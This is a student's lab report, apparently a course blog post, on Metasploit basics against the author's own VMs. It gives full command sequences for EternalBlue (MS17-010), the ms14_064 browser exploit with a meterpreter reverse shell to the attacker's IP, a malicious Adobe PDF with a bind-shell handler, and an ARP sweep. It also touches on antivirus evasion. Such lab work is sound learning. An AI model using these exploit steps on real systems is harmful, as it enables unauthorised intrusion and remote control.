2020-3-30 201755110王礼博 Exp6 MSF基础应用

目录

1.基础知识

1.1 msf模块说明

Exploit模块:渗透攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。

Payload模块:在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。

Encoder模块:针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征

Auxiliary模块:能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。

Post模块:支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行给各样的后渗透攻击动作。

Nop模块:空字段模块

1.2 主要指令

search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets: 显示目标(os版本)
set TARGET target number:设置目标版本
exploit:开始漏洞攻击
sessions -l:列出会话
sessions -i id:选择会话
sessions -k id:结束会话
Ctrl+z:把会话放到后台
Ctrl+c:结束会话
show auxiliary:显示辅助模块
use auxiliary name :使用辅助模块
set option name option:设置选项
exploit:运行模块

返回目录

2.一个主动攻击实践,如ms08_067

  • 攻击机kali:192.168.78.136,靶机win7:192.168.78.133

  • 先使用use auxiliary/scanner/smb/smb_ms17_010模块进行分析,show options是查看模块选项,设置目标IP地址,然后run运行,下面提示可能存在ms17-010漏洞

  • 接下来使用攻击模块use exploit/windows/smb/ms17_010_eternalblue,使用show targetsshow options分别查看攻击平台和选项

  • 设置目标ip地址,然后run运行就可以了,输入whoami(就是who am i)查看权限,直接就是system权限。

返回目录

3.一个针对浏览器的攻击,如ms11_050(唯一)

  • 攻击机kali:192.168.78.136,靶机xp:192.168.78.137

  • 浏览器攻击我看到的大多数是XP系统的,也有使用永恒之蓝攻击win7的,我尝试不使用永恒之蓝对win7进行浏览器攻击,详情参考这篇博客

  • 使用use exploit/windows/browser/ms14_064_ole_code_execution,加载漏洞利用模块

  • 注意使用set AllowPowershellPrompt true将其设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell,所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell。

  • 使用show options进行选项查看,可以看到支持的平台是XP,在我们设置完成后,也能攻击win7了

  • 接下来就是进行如下一系列常规设置,使用exploit运行
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.78.136 //设置攻击机IP
set RHOST 192.168.78.133 //设置靶机IP
exploit

  • 将上图画红线部分放置win7浏览器中

  • 使用sessions -i 1shell指令获取权限

返回目录

4.一个针对客户端的攻击,如Adobe

  • 启动msf输入search adobe查询针对adobe攻击模块

  • 使用use windows/fileformat/adobe_cooltype_sing设置模块,输入show payloads查找有效攻击载荷

  • 使用set payload windows/meterpreter/bind_tcp设置payloads

  • 根据options设置相关参数

set RHOST 192.168.78.137
set LPORT 5110
set FILENAME 20175110.pdf
exploit

  • 使用指令将文件复制到可以复制的文件夹下(当前账户进不去root文件夹)cp /root/.msf4/local/20175110.pdf /home/20175110wlb

  • 将生成的msf.pdf 复制到Windows XP中,back退出当前模块,进入监听模块
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
set RHOST 192.168.78.137 //靶机IP
set LPORT 5121 //攻击端口
exploit

  • 在xp上打开文件

  • 回连成功

返回目录

5.成功应用任何一个辅助模块

  • 攻击机kali:192.168.78.136,靶机win7:192.168.78.133

  • arp_sweep使用ARP请求枚举本地局域网络中的全部活跃主机进行扫描,emmm,好像只能看到win7的虚拟机。

use auxiliary/scanner/discovery/arp_sweep  //使用arp_sweep 模块

set RHOSTS 192.168.78.133/30 //用set进行hosts主机段设置

set THREADS 30 //设置扫描速度

run //开始扫描

返回目录

6.问题回答

用自己的话解释什么是exploit,payload,encode?
exploit:我个人感受是凡是有漏洞的地方都涉及到exploit,包括程序的生成、监控等等,触发各种漏洞,获得系统的权限。
payload:我的理解是一段攻击代码,各种功能的载体
encode:加壳,改变特征码,实现免杀

离实战还缺些什么技术或步骤?
免杀技术需要加强,比如说客户端攻击,需要生成文件放到靶机中,那么就必须让靶机认为这是一个正常的文件。
泛用性还需要加强,目前的漏洞对各种版本的系统、软件有针对性,但是如果面对更新的软件或系统,就可能攻击无效。
注入手段也需要加强,实战中很少白白注入的机会,必须要经过各种手段和伪装才能顺利在靶机上注入。

返回目录

7.实验总结与感想

本次的实验,我觉得挺纯粹的,就是关于msf的操作,实验的过程也很有趣,找漏洞,查payload,各种方式注入,能成功获得权限还是很有成就感的,如果能与以往的一些实验相结合,我觉得应该可以迈出实战的第一步。如果可以增加与同学电脑的活动,那就更有意思了。

返回目录

posted on 2020-04-28 11:54  WIDOMHUGO  阅读(156)  评论(0编辑  收藏  举报